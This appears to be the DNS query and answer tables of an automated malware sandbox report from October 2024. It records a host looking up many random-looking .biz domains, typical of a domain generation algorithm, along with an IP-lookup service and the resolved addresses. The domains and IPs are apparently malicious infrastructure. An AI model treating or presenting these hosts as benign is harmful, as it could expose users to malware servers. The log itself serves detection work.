                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.296082020 CEST192.168.2.51.1.1.10xcf22Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.660382032 CEST192.168.2.51.1.1.10x9ca0Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.745841980 CEST192.168.2.51.1.1.10x1584Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.902606964 CEST192.168.2.51.1.1.10xa571Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.495413065 CEST192.168.2.51.1.1.10x3d26Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.765274048 CEST192.168.2.51.1.1.10x7b53Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.048964024 CEST192.168.2.51.1.1.10x74dbStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.517148972 CEST192.168.2.51.1.1.10xae9bStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.084662914 CEST192.168.2.51.1.1.10xc9b6Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.584666967 CEST192.168.2.51.1.1.10x127bStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.942850113 CEST192.168.2.51.1.1.10x1370Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.425131083 CEST192.168.2.51.1.1.10x1741Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.073003054 CEST192.168.2.51.1.1.10x345cStandard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.279267073 CEST192.168.2.51.1.1.10x7f19Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.115287066 CEST192.168.2.51.1.1.10x6f06Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.126297951 CEST192.168.2.51.1.1.10x48bdStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.255410910 CEST192.168.2.51.1.1.10x48bdStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.486633062 CEST192.168.2.51.1.1.10x99fbStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.508049965 CEST192.168.2.51.1.1.10x99fbStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.093257904 CEST192.168.2.51.1.1.10x7784Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.854765892 CEST192.168.2.51.1.1.10xc2e0Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.031408072 CEST192.168.2.51.1.1.10x434eStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.632373095 CEST192.168.2.51.1.1.10xafd2Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.133444071 CEST192.168.2.51.1.1.10x891cStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.514288902 CEST192.168.2.51.1.1.10x8148Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.958306074 CEST192.168.2.51.1.1.10x4b20Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.712210894 CEST192.168.2.51.1.1.10xd91cStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.292406082 CEST192.168.2.51.1.1.10x1b38Standard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.365560055 CEST192.168.2.51.1.1.10xa06dStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.383003950 CEST192.168.2.51.1.1.10xa06dStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.640188932 CEST192.168.2.51.1.1.10x9a49Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.397409916 CEST192.168.2.51.1.1.10xed89Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.482611895 CEST192.168.2.51.1.1.10x58fdStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.297976971 CEST192.168.2.51.1.1.10x69b8Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.846045971 CEST192.168.2.51.1.1.10x3543Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.219214916 CEST192.168.2.51.1.1.10xea7fStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.358275890 CEST192.168.2.51.1.1.10x659eStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.862147093 CEST192.168.2.51.1.1.10xd10fStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.997092009 CEST192.168.2.51.1.1.10xa194Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.565181971 CEST192.168.2.51.1.1.10xa5bStandard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.574513912 CEST192.168.2.51.1.1.10x4a08Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.117322922 CEST192.168.2.51.1.1.10xb850Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.589631081 CEST192.168.2.51.1.1.10xf098Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.689766884 CEST192.168.2.51.1.1.10xf098Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.693413019 CEST192.168.2.51.1.1.10xcce5Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.361083031 CEST192.168.2.51.1.1.10xf98fStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.445163012 CEST192.168.2.51.1.1.10x30a4Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.747029066 CEST192.168.2.51.1.1.10xbf57Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.866389990 CEST192.168.2.51.1.1.10xdc87Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.124671936 CEST192.168.2.51.1.1.10x9b43Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.490029097 CEST192.168.2.51.1.1.10xeb95Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.097177029 CEST192.168.2.51.1.1.10xeaecStandard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.868161917 CEST192.168.2.51.1.1.10x96c7Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.011159897 CEST192.168.2.51.1.1.10x945dStandard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.185734034 CEST192.168.2.51.1.1.10xd13dStandard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.383723021 CEST192.168.2.51.1.1.10xa8a4Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.263416052 CEST192.168.2.51.1.1.10x7c5Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.269483089 CEST192.168.2.51.1.1.10xec83Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.303419113 CEST192.168.2.51.1.1.10xa107Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.341582060 CEST192.168.2.51.1.1.10x8c49Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.379683971 CEST192.168.2.51.1.1.10xd23aStandard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.432420969 CEST192.168.2.51.1.1.10x2f6dStandard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.474070072 CEST192.168.2.51.1.1.10x8d59Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.487981081 CEST192.168.2.51.1.1.10x70ccStandard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.537816048 CEST192.168.2.51.1.1.10xa379Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.284212112 CEST192.168.2.51.1.1.10x419cStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.323402882 CEST192.168.2.51.1.1.10xc834Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.352051973 CEST192.168.2.51.1.1.10xc834Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.490817070 CEST192.168.2.51.1.1.10x3072Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.944935083 CEST192.168.2.51.1.1.10xf364Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.955447912 CEST192.168.2.51.1.1.10x7a2Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:14.373477936 CEST192.168.2.51.1.1.10x798fStandard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.336637974 CEST192.168.2.51.1.1.10x523Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.378068924 CEST192.168.2.51.1.1.10xc268Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.277139902 CEST192.168.2.51.1.1.10x8bd1Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.305124044 CEST192.168.2.51.1.1.10x8bd1Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.748071909 CEST192.168.2.51.1.1.10xafffStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.469504118 CEST192.168.2.51.1.1.10xb71dStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:18.176702976 CEST192.168.2.51.1.1.10x70ccStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.484422922 CEST192.168.2.51.1.1.10x2d00Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.974982023 CEST192.168.2.51.1.1.10x46b2Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.240353107 CEST192.168.2.51.1.1.10x21eeStandard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.695300102 CEST192.168.2.51.1.1.10x916aStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.108798981 CEST192.168.2.51.1.1.10x1ba6Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.186536074 CEST192.168.2.51.1.1.10xe6ccStandard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.958084106 CEST192.168.2.51.1.1.10x5d71Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.976974010 CEST192.168.2.51.1.1.10x5d71Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.400058985 CEST192.168.2.51.1.1.10x3b88Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.408684015 CEST192.168.2.51.1.1.10x3d64Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.532126904 CEST1.1.1.1192.168.2.50x8063No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.608179092 CEST1.1.1.1192.168.2.50x6b19No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.608179092 CEST1.1.1.1192.168.2.50x6b19No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.608179092 CEST1.1.1.1192.168.2.50x6b19No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.789944887 CEST1.1.1.1192.168.2.50x8a94No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.976999998 CEST1.1.1.1192.168.2.50x3311No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.776401043 CEST1.1.1.1192.168.2.50xbcc0No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.780160904 CEST1.1.1.1192.168.2.50xb66cNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:27.813123941 CEST1.1.1.1192.168.2.50xad3aNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:27.864829063 CEST1.1.1.1192.168.2.50xbd45No error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.180768967 CEST1.1.1.1192.168.2.50x256dNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.333771944 CEST1.1.1.1192.168.2.50xfaaNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.333771944 CEST1.1.1.1192.168.2.50xfaaNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.321170092 CEST1.1.1.1192.168.2.50x3b3aNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.539918900 CEST1.1.1.1192.168.2.50x3833Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.552664042 CEST1.1.1.1192.168.2.50xbfd3No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.054842949 CEST1.1.1.1192.168.2.50x3fc2No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.054842949 CEST1.1.1.1192.168.2.50x3fc2No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.928452969 CEST1.1.1.1192.168.2.50x457cName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.938716888 CEST1.1.1.1192.168.2.50x5da3Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.946038961 CEST1.1.1.1192.168.2.50x94a4No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:31.575464010 CEST1.1.1.1192.168.2.50x2decName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:31.584899902 CEST1.1.1.1192.168.2.50x99faNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.332683086 CEST1.1.1.1192.168.2.50xaad4Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.350624084 CEST1.1.1.1192.168.2.50x7c3fName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.361990929 CEST1.1.1.1192.168.2.50xa0f1No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:45.798940897 CEST1.1.1.1192.168.2.50x4376No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:56.937968969 CEST1.1.1.1192.168.2.50x6166No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.030898094 CEST1.1.1.1192.168.2.50xa845No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.926546097 CEST1.1.1.1192.168.2.50x69dNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.419620991 CEST1.1.1.1192.168.2.50x1222No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.048959017 CEST1.1.1.1192.168.2.50xe39dNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.530653954 CEST1.1.1.1192.168.2.50xf4ebNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.162425041 CEST1.1.1.1192.168.2.50xb8d3No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.162425041 CEST1.1.1.1192.168.2.50xb8d3No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.703038931 CEST1.1.1.1192.168.2.50x639bNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:13.687570095 CEST1.1.1.1192.168.2.50x9409No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:14.674923897 CEST1.1.1.1192.168.2.50x7233No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:15.606404066 CEST1.1.1.1192.168.2.50x573dNo error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:18.716517925 CEST1.1.1.1192.168.2.50x8c09No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:19.547077894 CEST1.1.1.1192.168.2.50x43dbNo error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:21.017524958 CEST1.1.1.1192.168.2.50x1d8No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.408539057 CEST1.1.1.1192.168.2.50xcdc9No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.952207088 CEST1.1.1.1192.168.2.50x1434No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.952207088 CEST1.1.1.1192.168.2.50x1434No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:25.000169992 CEST1.1.1.1192.168.2.50x3441No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:25.855870962 CEST1.1.1.1192.168.2.50xc8cbNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:27.193123102 CEST1.1.1.1192.168.2.50x6247No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:28.127357960 CEST1.1.1.1192.168.2.50x12f8No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:29.055116892 CEST1.1.1.1192.168.2.50x4df7No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:30.682223082 CEST1.1.1.1192.168.2.50x80c4No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:31.372601032 CEST1.1.1.1192.168.2.50x7f9eNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:32.128508091 CEST1.1.1.1192.168.2.50x6315No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:33.747589111 CEST1.1.1.1192.168.2.50x248eNo error (0)vyome.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.543853045 CEST1.1.1.1192.168.2.50xb58fNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.399429083 CEST1.1.1.1192.168.2.50x48c6No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.963459015 CEST1.1.1.1192.168.2.50xab3dNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.561502934 CEST1.1.1.1192.168.2.50x66faNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.710150957 CEST1.1.1.1192.168.2.50x9ae0No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.332496881 CEST1.1.1.1192.168.2.50xf74No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.945869923 CEST1.1.1.1192.168.2.50x72a9No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.892818928 CEST1.1.1.1192.168.2.50x36efNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.010734081 CEST1.1.1.1192.168.2.50x57c7No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.954185009 CEST1.1.1.1192.168.2.50x80b7No error (0)qpnczch.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.304174900 CEST1.1.1.1192.168.2.50xcf22No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.667912960 CEST1.1.1.1192.168.2.50x9ca0No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.910897970 CEST1.1.1.1192.168.2.50xa571No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.942065001 CEST1.1.1.1192.168.2.50x1584No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.675154924 CEST1.1.1.1192.168.2.50x3d26No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.772552967 CEST1.1.1.1192.168.2.50x7b53No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.055941105 CEST1.1.1.1192.168.2.50x74dbNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
